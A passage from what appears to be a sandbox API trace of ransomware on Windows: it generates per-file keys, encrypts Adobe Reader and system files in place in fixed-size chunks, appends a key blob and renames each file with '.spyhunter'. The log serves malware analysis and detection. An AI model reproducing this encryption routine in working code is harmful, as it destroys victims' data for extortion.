10.0\\resource\\font\\minionpro-regular.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf.spyhunter")) returned 1 [0120.120] GetProcessHeap () returned 0x2c0000 [0120.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0120.120] GetProcessHeap () returned 0x2c0000 [0120.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0120.120] GetProcessHeap () returned 0x2c0000 [0120.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f310 | out: hHeap=0x2c0000) returned 1 [0120.120] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8e8 | out: pbBuffer=0x248f8e8) returned 1 [0120.120] GetProcessHeap () returned 0x2c0000 [0120.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0120.120] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8e0*=0x30) returned 1 [0120.121] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0120.123] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt") returned 108 [0120.123] StrStrW (lpFirst="DisplayLanguageNames.cs.txt", lpSrch=".txt") returned=".txt" [0120.123] lstrlenW (lpString=".txt") returned 4 [0120.123] lstrlenW (lpString=".txt") returned 4 [0120.123] GetProcessHeap () returned 0x2c0000 [0120.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0120.123] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.273] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.274] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.274] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.405] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.405] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.405] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f8a4*=0x24c0, lpOverlapped=0x0) returned 1 [0120.405] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffdb40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.405] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x24c0, lpNumberOfBytesWritten=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f8a4*=0x24c0, lpOverlapped=0x0) returned 1 [0120.405] GetProcessHeap () returned 0x2c0000 [0120.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0120.406] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.406] WriteFile (in: hFile=0x17c, lpBuffer=0x248f8e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x248f8e4*, lpNumberOfBytesWritten=0x248f8a4*=0x4, lpOverlapped=0x0) returned 1 [0120.406] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8a4*=0x30, lpOverlapped=0x0) returned 1 [0120.406] CloseHandle (hObject=0x17c) returned 1 [0120.406] GetProcessHeap () returned 0x2c0000 [0120.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0120.407] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt.spyhunter") returned 118 [0120.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt.spyhunter")) returned 1 [0120.408] GetProcessHeap () returned 0x2c0000 [0120.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0120.408] GetProcessHeap () returned 0x2c0000 [0120.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0120.408] GetProcessHeap () returned 0x2c0000 [0120.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e819b8 | out: hHeap=0x2c0000) returned 1 [0120.411] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8e0 | out: pbBuffer=0x248f8e0) returned 1 [0120.411] GetProcessHeap () returned 0x2c0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0120.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8d8*=0x30) returned 1 [0120.411] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0120.412] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt") returned 101 [0120.412] StrStrW (lpFirst="zdingbat.txt", lpSrch=".txt") returned=".txt" [0120.412] lstrlenW (lpString=".txt") returned 4 [0120.412] lstrlenW (lpString=".txt") returned 4 [0120.412] GetProcessHeap () returned 0x2c0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0120.412] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f89c*=0x2800, lpOverlapped=0x0) returned 1 [0120.436] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.436] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f89c*=0x2800, lpOverlapped=0x0) returned 1 [0120.436] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f89c*=0x69c, lpOverlapped=0x0) returned 1 [0120.436] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff964, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.436] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x69c, lpNumberOfBytesWritten=0x248f89c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f89c*=0x69c, lpOverlapped=0x0) returned 1 [0120.437] GetProcessHeap () returned 0x2c0000 [0120.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0120.437] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.437] WriteFile (in: hFile=0x17c, lpBuffer=0x248f8dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f89c, lpOverlapped=0x0 | out: lpBuffer=0x248f8dc*, lpNumberOfBytesWritten=0x248f89c*=0x4, lpOverlapped=0x0) returned 1 [0120.437] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f89c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f89c*=0x30, lpOverlapped=0x0) returned 1 [0120.437] CloseHandle (hObject=0x17c) returned 1 [0120.437] GetProcessHeap () returned 0x2c0000 [0120.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0120.437] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt.spyhunter") returned 111 [0120.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt.spyhunter")) returned 1 [0120.558] GetProcessHeap () returned 0x2c0000 [0120.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0120.558] GetProcessHeap () returned 0x2c0000 [0120.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0120.558] GetProcessHeap () returned 0x2c0000 [0120.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1a18 | out: hHeap=0x2c0000) returned 1 [0120.558] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8d8 | out: pbBuffer=0x248f8d8) returned 1 [0120.558] GetProcessHeap () returned 0x2c0000 [0120.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0120.558] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8d0*=0x30) returned 1 [0120.558] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0120.581] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT") returned 98 [0120.581] StrStrW (lpFirst="TURKISH.TXT", lpSrch=".txt") returned 0x0 [0120.581] GetProcessHeap () returned 0x2c0000 [0120.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0120.581] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f894, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f894*=0x2800, lpOverlapped=0x0) returned 1 [0120.618] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.618] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f894, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f894*=0x2800, lpOverlapped=0x0) returned 1 [0120.618] GetProcessHeap () returned 0x2c0000 [0120.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0120.618] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.619] WriteFile (in: hFile=0xec, lpBuffer=0x248f8d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f894, lpOverlapped=0x0 | out: lpBuffer=0x248f8d4*, lpNumberOfBytesWritten=0x248f894*=0x4, lpOverlapped=0x0) returned 1 [0120.655] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f894, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f894*=0x30, lpOverlapped=0x0) returned 1 [0120.655] CloseHandle (hObject=0xec) returned 1 [0120.655] GetProcessHeap () returned 0x2c0000 [0120.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0120.656] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT.spyhunter") returned 108 [0120.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt.spyhunter")) returned 1 [0120.657] GetProcessHeap () returned 0x2c0000 [0120.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0120.657] GetProcessHeap () returned 0x2c0000 [0120.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0120.657] GetProcessHeap () returned 0x2c0000 [0120.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2cf8 | out: hHeap=0x2c0000) returned 1 [0120.660] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8d8 | out: pbBuffer=0x248f8d8) returned 1 [0120.660] GetProcessHeap () returned 0x2c0000 [0120.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0120.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8d0*=0x30) returned 1 [0120.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0120.660] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT") returned 96 [0120.660] StrStrW (lpFirst="CP949.TXT", lpSrch=".txt") returned 0x0 [0120.660] GetProcessHeap () returned 0x2c0000 [0120.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0120.661] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f894, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f894*=0x2800, lpOverlapped=0x0) returned 1 [0121.255] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.256] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f894, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f894*=0x2800, lpOverlapped=0x0) returned 1 [0121.256] GetProcessHeap () returned 0x2c0000 [0121.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0121.256] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.256] WriteFile (in: hFile=0xec, lpBuffer=0x248f8d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f894, lpOverlapped=0x0 | out: lpBuffer=0x248f8d4*, lpNumberOfBytesWritten=0x248f894*=0x4, lpOverlapped=0x0) returned 1 [0122.521] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f894, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f894*=0x30, lpOverlapped=0x0) returned 1 [0122.521] CloseHandle (hObject=0xec) returned 1 [0122.521] GetProcessHeap () returned 0x2c0000 [0122.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0122.522] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT.spyhunter") returned 106 [0122.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt.spyhunter")) returned 1 [0122.523] GetProcessHeap () returned 0x2c0000 [0122.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0122.523] GetProcessHeap () returned 0x2c0000 [0122.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.523] GetProcessHeap () returned 0x2c0000 [0122.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3b30 | out: hHeap=0x2c0000) returned 1 [0122.524] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8d0 | out: pbBuffer=0x248f8d0) returned 1 [0122.524] GetProcessHeap () returned 0x2c0000 [0122.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.524] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8c8*=0x30) returned 1 [0122.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.539] GetProcessHeap () returned 0x2c0000 [0122.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.539] GetProcessHeap () returned 0x2c0000 [0122.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b100 | out: hHeap=0x2c0000) returned 1 [0122.540] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8c8 | out: pbBuffer=0x248f8c8) returned 1 [0122.540] GetProcessHeap () returned 0x2c0000 [0122.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.540] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8c0*=0x30) returned 1 [0122.540] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.546] GetProcessHeap () returned 0x2c0000 [0122.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.551] GetProcessHeap () returned 0x2c0000 [0122.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfc68 | out: hHeap=0x2c0000) returned 1 [0122.551] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8c8 | out: pbBuffer=0x248f8c8) returned 1 [0122.551] GetProcessHeap () returned 0x2c0000 [0122.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.551] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8c0*=0x30) returned 1 [0122.551] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.575] GetProcessHeap () returned 0x2c0000 [0122.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.576] GetProcessHeap () returned 0x2c0000 [0122.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03a88 | out: hHeap=0x2c0000) returned 1 [0122.581] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8c0 | out: pbBuffer=0x248f8c0) returned 1 [0122.581] GetProcessHeap () returned 0x2c0000 [0122.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.581] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8b8*=0x30) returned 1 [0122.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.598] GetProcessHeap () returned 0x2c0000 [0122.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0122.598] GetProcessHeap () returned 0x2c0000 [0122.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf6f0 | out: hHeap=0x2c0000) returned 1 [0122.599] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8c0 | out: pbBuffer=0x248f8c0) returned 1 [0122.599] GetProcessHeap () returned 0x2c0000 [0122.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0122.599] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8b8*=0x30) returned 1 [0122.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.602] 